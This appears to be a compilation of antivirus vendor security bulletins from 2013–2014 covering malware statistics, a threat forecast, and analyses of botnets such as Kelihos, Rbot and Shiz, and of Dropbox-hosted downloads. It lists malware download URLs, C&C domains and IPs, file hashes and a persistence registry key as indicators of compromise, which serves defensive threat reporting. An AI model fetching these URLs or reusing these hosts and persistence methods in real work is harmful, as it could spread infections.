• In July we noticed that the IRC bots: NrgBot, Blazebot and Rbot can work in tandem infecting the same computer at the same time.

You can always find descriptions for the latest backdoors in the Malware Encyclopedia.

8. Statistics 2013

Top20 Blocked Malware - December 2013

The Top 20 malicious programs blocked on PCs

Top20 Blocked Malware in 2013

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - December 2013

The table below ranks the most prevalent families seen in December.

New malicious programs entered the Top 20

Malware Prevalence Table in 2013

New malicious programs entered the Top 20

Top20 Potentially Unwanted Programs - December 2013

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Top20 Potentially Unwanted Programs in 2013

Top20 PUPs detected on user’s PC

Operating Systems - December 2013

Operating Systems During 2013

Geography of Infections During 2013

Malware distribution shows that the United States is the biggest contributor of malware samples. This, however, is to be expected given the number of Lavasoft customers in North America.

Infections by country of origin

9. Forecast for 2014

We are expecting the following threats and attacks in 2014:
1) Tor network will be used by botnets for anonymous communication with C&C servers as we the new variants of Zeus backdoor introduced this year.

2) More 64-bit backdoors will appear the next year following the Zeus example. We see that Zbot (Zeus bot) is used to test innovations now and other bots will copy new features once they complete the verification stage.

3) Botnets will continue using public file-sharing services like Dropbox to download malware and PUPs.

4) Ransomware, apparently originating from the FBI and police will target “guilty" users for downloading "prohibited content" by blocking computers until victims pay, so called, "administrative fees". Bitcoins will be used to pay the ransom.

5) Cryptolockers will continue encrypting personal information using unbreakable cyphers and selling decrypting tools to victims.

6) Bitcoin is on the rise so we can expect an increase of malware installing Bitcoin miners onto victim’s computers. However, the focus could well be switched to stealing Bitcoin wallets rather than generating new BTC as it is becoming harder and harder to so do. Bitcoin banking services will be attractive targets based on the numerous successful attacks in 2012/2013. We expect new attacks on Bitcoin banking services (See “Bitcoin Games”).

7) Android malware will continue to rise in 2014 with attacks on mobile banking application by means of exploiting new vulnerabilities in Android OS (e.g. Trojan Svpeng).

The main trend we foresee is that cyber criminals will tend to hide theirs activity in the anonymous Tor network. In such cases, C&C servers and ordinary bots will not be traceable. This means researchers cannot find the geographical location of the botnet computers and close them. The pseudo-top-level domain “,onion” used in Tor network to locate the host (e.g. b742crfibawhnims.onion) is not an ordinary DNS name and cannot be located on a root server. Thus, this addressing mechanism makes it more difficult to trace a C&C server, a zombie computer or takedown a whole botnet inside the Tor network.

Another main focus is the use of anonymous Bitcoin currency for payments and cyber-thefts - Bitcoins can be easily stolen. Also, since they have no personal information attached, victims cannot prove they owned these particular Bitcoins before being robbed. Inexperienced Bitcoin owners can easily be scammed by fake or dubious Bitcoin banking services as they could be run by criminals. Users should make certain that any Bitcoin banking services they use are run by legitimate operators.

Top20 Blocked Malware

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - January 2014

The table below ranks the most prevalent families seen in January.

New malicious programs entering the Top 20

A new Fake-AV interface named ‘Windows Diagnosis’ was discovered in the wild in January. It falsely claims that a user’s computer has security problems which are supposedly fixable with the help of paid technical support. It is detected by Ad-Aware as Adware.Generic.647515.

Fake AV (MD5: 342d20129481c90298dcb722c1f68c6c) is detected by Ad-Aware as Adware.Generic.647515

Bots Review

Table: Bots under analysis (January 2014, Lavasoft MAS).

Bot distribution in January:

Kelihos

The kelihos download URL can be easily recognized using the following url mask:

http://[IP Address]/mod[id]/[file name].exe

For example:

hxxp://123.240.9.110/mod2/tayran1.exe
hxxp://126.117.193.122/mod1/tayran1.exe
hxxp://89.47.95.27/mod1/yanicha.exe

This month we have the following file names mentioned in URLs that download Kelihos updates:

ssk0001.exe, ramps01.exe, tayran1.exe, keybex1.exe, gnomrea.exe

You can find the latest description on Kelihos here.

Cycbot. You can find the latest description on Cycbot here.
Shiz. The activity of the backdoor goes down. The latest example is here.
Zbot. You can find the latest description on Cycbot here
NrgBot/Dorkbot. The latest description shows that it is capable of running on Windows 7 64-bits, where it starts 32-bits mspaint.exe process and injects its code into the Paint process.

Rbot.
In January, Lavasoft’s Malware Analysis System continued to detect Rbot activity. At the time of writing the latest version of Rbot still connected to C&C "videos.p0rn-lover.us", which sends commands to tandem IRC bots.
The commands sent to IRC bots in January 2014 are:

In addition we discovered a new IRC channel ##USA:

The following files were downloaded by URLs in channels:

ftp://{censored}:{censored}@178.33.232.15:8989/sys.exe

The file is 581182 bytes in size (MD5: 87bdba077896af4cd51a2bfc3d0c080a).

hxxp://www.dropbox.com/s/riiuyej7lza32i3/ms.exe?dl=1

The file is 493122 bytes in size (MD5: 3dd4700eaeecf9d09f2816850d1be03a).

During the month we detected eight successful downloads from Dropbox by Rbot and other malware. We see that popular file sharing services are still in use by malware despite the security control measures implemented by the affected service providers.

Source: grahamcluley.com

SpyEye.
One of SpyEye actors, Aleksandr Panin, pleaded guilty in Atlanta, US on 28th of January 2014.

The SpyEye trojan described in Malware Encyclopedia here and here was the second most prevalent banking trojan after Zbot (Zeus backdoor).

Source: bbc.co.uk

In 2011 SpyEye attacked Android devices and became capable of bypassing TFA of online banking services.
During the investigation the FBI managed to locate the SpyEye C&C server which “contained the full suite of features designed to steal confidential financial information, make fraudulent online banking transactions, install keystroke loggers, and initiate distributed denial of service (or DDoS) attacks from computers infected with malware”. Panin was caught when selling new versions of SpyEye on hacker forums. The price of the trojan varied from $1500 to $8500.
It was not the first case where SpyEye developers were arrested. In summer 2012 three cyber criminals were arrested in connection with the SpyEye botnet.

In Spring 2013 Hamza Bendelladj of Algeria was also arrested in Thailand and brought to justice in the US for running the SpyEye botnet that stole money from victims’ bank accounts.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Lavasoft Security Bulletin - February 2014: Under the Dropbox Umbrella

Last month we detected several attempts to download malware using Dropbox as the distribution point. The following are some examples of Dropbox being used for malicious purposes.

1. Rbot/Blazebot (MD5: 9a3490eb3f1e7cc6badde2a680e5975e) downloads and installs fake IM messenger called “skype.exe” (MD5: cca08446df60bace2fdf019c818edec3) detected as Trojan.GenericKD.1523066 by Ad-Aware.
The URL used is:

hxxp://www.v.dropbox.com/s/b5ne62m4z1f3n0e/ms.exe?dl=1

The downloaded application is installed as “skype.exe” in %Windows% folder. It is detected as Trojan.GenericKD.1523066 by Ad-Aware.

2. The polymorphic Fake AV (MD5: c7c1b6f38f5301526c1636d00826094e
and 27 more copies) connects to Dropbox to download a compressed Adobe Flash Player dll.

hxxp://dl-balancer.x.dropbox.com/u/69432480/NPSWF32.z

The downloaded file (MD5: 8e2fae29b76ffc2a137859c605ec974d4c1d) contains the compressed Adobe Flash Player 11.1 library NPSWF32.dll (MD5: de3745a51b7ac7fedc356a83f76c8023). It will be dropped only after patching the first three bytes with the PE signature “MZP” instead of “123”.

3. Another Trojan (MD5: b8402b719d03f467f3b833886810d2e6), detected as Trojan.Generic.8048033 by Ad-Aware, downloads and installs the fake Realtek Audio Driver using the Adobe Download Assistant.
The URLs used are:

hxxp://dl-balancer.x.dropbox.com/s/qh9jjar5l0zxwu2/unzip.exe?dl=1,
hxxp://dl-balancer.x.dropbox.com/s/f5gcg6shw7we4e6/tools.zip?dl=1

The first file, unzip.exe, is a legitimate application used to extract data from another file, tools.zip. Both files are stored in the following folder:

%Documents and Settings%\%current user%\Application Data\Realtek\

The file, “reg.reg”, containing registry settings, is launched using regedit.exe and adds the following run key into the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"HD Audio Driver" = "%WinDir%\explorer.exe %Documents and Settings%\%current user%\Application Data\Realtek\RAVCpl32.exe"

We see that “RAVCpl32.exe” (a.k.a. “zcontrol.exe”, MD5: 57fdb4c4017dcf4a64824c6ac86ca887), detected as Gen:Variant.Symmi.13498 by Ad-Aware, will be started at Windows boot up.
Additionally, the malicious downloader uses the legitimate Adobe Download Assistant (ADA) to initiate the download and installation of Adobe AIR from airdownload.adobe.com. The following window is shown to the user while the infection process takes place.

It is not clear why the Adobe AIR cross-platform runtime system is installed - it could be used to distract the user’s attention away from the malicious downloads and the fake Realtek Audio Driver installation.
As we have seen, Dropbox can be used for malicious purposes such as downloading components used by malware. Well-known software brand names are used to distract the user when downloading and installing supposedly trustworthy applications: brands such as Skype, Realtek and Adobe are used to hide the infection making it difficult to spot the attacker’s malicious intent.

Bot Review

Table: Bots under analysis (February 2014, Lavasoft MAS).

Bot distribution in February:

Kelihos

Kelihos continues to download new versions of itself, now using the following url mask:

http://[IP Address]/mod[id]/[file name].exe

For example:

hxxp://77.122.80.243/mod2/keybex1.exe
hxxp://178.150.171.207/mod1/keybex1.exe

You can find the latest description on Kelihos here.

Cycbot. Shows no sign of disappearing soon. You can find the latest description on Cycbot here.

Shiz. The backdoor is still alive despite decreased number of occurrences. The latest example is here.
The list of domains Shiz connects to:

URL	IP
hxxp://digivehusyd.eu/login.php	69.195.129.70
hxxp://gadufiwabim.eu/login.php	50.116.56.144
hxxp://kefuwidijyp.eu/login.php (ET CNC Zeus/Spyeye/Palevo Tracker Reported CnC Server (group 3) , Malicious)	173.230.133.99
hxxp://vofozymufok.eu/login.php	209.160.22.9
jefapexytar.eu	50.116.56.144
fokyxazolar.eu	50.116.56.144
xuqohyxeqak.eu	50.116.56.144
cihunemyror.eu	50.116.56.144
lyruxyxaxaw.eu	50.116.56.144
www.bing.com	204.79.197.200
foxivusozuc.eu	50.116.56.144
ryqecolijet.eu	50.116.56.144
puregivytoh.eu	Unresolvable
gahihezenal.eu	Unresolvable
qegytuvufoq.eu	Unresolvable
vojacikigep.eu	Unresolvable
makagucyraj.eu	Unresolvable
tucyguqaciq.eu	Unresolvable
nozoxucavaq.eu	Unresolvable
puvopalywet.eu	Unresolvable
ciliqikytec.eu	Unresolvable
tunujolavez.eu	Unresolvable
xutekidywyp.eu	Unresolvable
dikoniwudim.eu	Unresolvable
divywysigud.eu	Unresolvable
lyvejujolec.eu	Unresolvable
puzutuqeqij.eu	Unresolvable
fobonobaxog.eu	Unresolvable
rydinivoloh.eu	Unresolvable
lysovidacyx.eu	Unresolvable
qeqinuqypoq.eu	Unresolvable
magofetequb.eu	Unresolvable
tupazivenom.eu	Unresolvable
rytuvepokuv.eu	Unresolvable
qetoqolusex.eu	Unresolvable
masisokemep.eu	Unresolvable
gatedyhavyd.eu	Unresolvable
fodakyhijyv.eu	Unresolvable
cicaratupig.eu	Unresolvable
vocumucokaj.eu	Unresolvable
nofyjikoxex.eu	Unresolvable
tuwikypabud.eu	Unresolvable
kepymexihak.eu	Unresolvable
xuxusujenes.eu	Unresolvable
lymylorozig.eu	Unresolvable
jepororyrih.eu	Unresolvable
xubifaremin.eu	Unresolvable
dimutobihom.eu	Unresolvable
voniqofolyt.eu	Unresolvable
fogeliwokih.eu	Unresolvable
dixemazufel.eu	Unresolvable
qederepuduf.eu	Unresolvable
kemocujufys.eu	Unresolvable
nojuletacuf.eu	Unresolvable
rynazuqihoj.eu	Unresolvable
marytymenok.eu	Unresolvable
jejedudupuc.eu	Unresolvable
volebatijub.eu	Unresolvable
ciqydofudyx.eu	Unresolvable
cinepycusaw.eu	Unresolvable
keraborigin.eu	Unresolvable
pumadypyruv.eu	Unresolvable
nopegymozow.eu	Unresolvable
galokusemus.eu	Unresolvable
jewuqyjywyv.eu	Unresolvable

Zbot. We counted 197 backdoors this month, 94 of them install a Tor client to communicate with the C&C. server. You can find the latest description on Zbot here
NrgBot/Dorkbot. The latest description is here.

Rbot. The latest description is available in Malware Encyclopedia.

Read the part 1: Lavasoft Security Bulletin - February 2014: Under the Dropbox Umbrella.

Top20 Blocked Malware